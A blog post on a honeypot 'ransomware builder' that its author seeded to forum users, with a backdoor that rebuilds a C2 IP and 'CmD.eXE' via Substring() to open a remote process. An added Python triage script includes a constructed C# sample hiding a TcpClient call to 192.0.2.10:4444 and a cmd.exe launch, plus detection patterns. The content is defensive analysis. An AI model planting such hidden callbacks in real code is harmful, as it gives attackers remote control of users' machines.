How I hacked 100 hackers

Cristian Cornea
Nov 12, 2024

… Or script kiddies I could say

Jinn Ransomware Builder Honeypot

“Boredom always precedes a period of great creativity” — Robert M. Pirsig

How it started

Photo by Kenny Eliason on Unsplash

How it ended

Top #3 in Software Category on BreachForums
Over 100 C2 connections

Jinn Ransomware Builder on Social Media

What was “Jinn Ransomware” supposed to be?

A builder that was able to construct a fully customizable ransomware with the following features:

  1. C2 Callbacks
  2. Multi-language support (PowerShell/C#/Python)
  3. AES encryption & decryption
  4. No detection

What it is in reality

Jinn Ransomware Builder is actually a honeypot, but some of the features presented above are real.

Let’s add the missing words to the list:

1. C2 Callbacks — backdoored & hardcoded:

Line 139 — TCP Connection

The TcpClient() constructor takes two arguments: the destination host and port.

As you can observe, the host argument is built with the Substring() function, which extracts the IP address from the long string.

Process _Tiger = new Process();

This is used to initiate a new process in memory.

_Tiger.StartInfo.FileName = GetFileName();

Note this function; it is explained below.

Line 173 — Executable name

The GetFileName() function builds the stager name using the same Substring() function as in the TcpClient() call.

Result: CmD.eXE

Conclusion: Our code is used to initiate a remote connection and open a process with the “CmD.eXE” executable that is being hosted on that server.

2. Multi-language support (PowerShell/C#/Python) — theoretically, yes:

…But in practice, it is just a prompt

The user was supposed to create the configuration of the ransomware implant from the command line, by completing the C2 details, language of the implant (PowerShell, C#, Python), Persistence mode (None, Scheduled Task, New Account Creation), Password for Decryption and the list of file extensions to be encrypted.

In the end, the builder was supposed to generate two executables — one used for encryption and one for decryption.

It was used to add more spice to the features list, don’t be mad please!

3. AES encryption & decryption — but the functions are not fully functional:

Those were added to the builder in order to:

  • Make it look like a legit ransomware builder
  • Hide the hardcoded backdoor in plain sight

In reality, a basic analysis of the source code, starting from the main function of the program, would reveal that:

Main Function

The first method called is me(), which is the backdoor connection.

Its definition is shown again below.

me() method

4. No detection — nothing to add here😏:

0/75 detection on VirusTotal

Lessons Learned

Always analyze the code within the samples of exploits & hacking tools taken from the Internet

  • Check for IP addresses and ports
  • Check for functions that open new connections
  • Check for functions that attempt to run system commands
  • If it has zero detections on VirusTotal, it doesn’t actually mean it’s benign
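The first three checks above can be automated for C# source, including the Substring() trick from the C2 section, which hides the address from a plain IP grep. This is an added example, not code from the original post or from the Jinn builder; the sample snippet, its strings, the port and the address (192.0.2.10, a documentation range) are constructed, and the function names are hypothetical.

```python
import re

# Constructed sample (not the real Jinn source): an address and a file name
# hidden inside longer strings and cut out with Substring(start, length).
SAMPLE = r'''
string _k = "x9Qa71c192.0.2.10Zp0LmW3";
TcpClient c = new TcpClient(_k.Substring(7, 10), 4444);
Process _Tiger = new Process();
_Tiger.StartInfo.FileName = "q8CmD.eXEzz1".Substring(2, 7);
'''

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
NET_RE = re.compile(r"\b(TcpClient|UdpClient|Socket|WebClient|HttpClient)\b")
EXEC_RE = re.compile(r"\b(Process|ProcessStartInfo)\b")
ASSIGN_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"\s*;')
SUBSTR_RE = re.compile(
    r'(?:"([^"]*)"|(\w+))\.Substring\(\s*(\d+)\s*,\s*(\d+)\s*\)')


def resolve_substrings(src):
    """Evaluate Substring(start, length) on string literals, or on
    variables that were assigned a string literal earlier in the source."""
    consts = dict(ASSIGN_RE.findall(src))
    resolved = []
    for literal, var, start, length in SUBSTR_RE.findall(src):
        text = consts.get(var) if var else literal
        if text is not None:  # skip variables we could not resolve statically
            s, n = int(start), int(length)
            resolved.append(text[s:s + n])
    return resolved


def triage(src):
    """Return the indicators a reviewer should inspect before running a tool."""
    hidden = resolve_substrings(src)
    return {
        "literal_ips": IP_RE.findall(src),          # what a plain grep sees
        "hidden_strings": hidden,                    # values rebuilt at runtime
        "hidden_ips": [h for h in hidden if IP_RE.fullmatch(h)],
        "network_apis": sorted(set(NET_RE.findall(src))),
        "exec_apis": sorted(set(EXEC_RE.findall(src))),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

A network API and a process API in the same file, fed by strings that only exist after slicing, is the pattern to stop on: the plain IP search returns nothing while the resolved strings expose both the address and the executable name.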

Verify the quality of the Threat Intelligence that you are spreading on Social Media or to your clients

Legal disclaimer

The activities were done in a simulated environment. No illegal hacking attempts were performed and I strictly discourage any such actions.
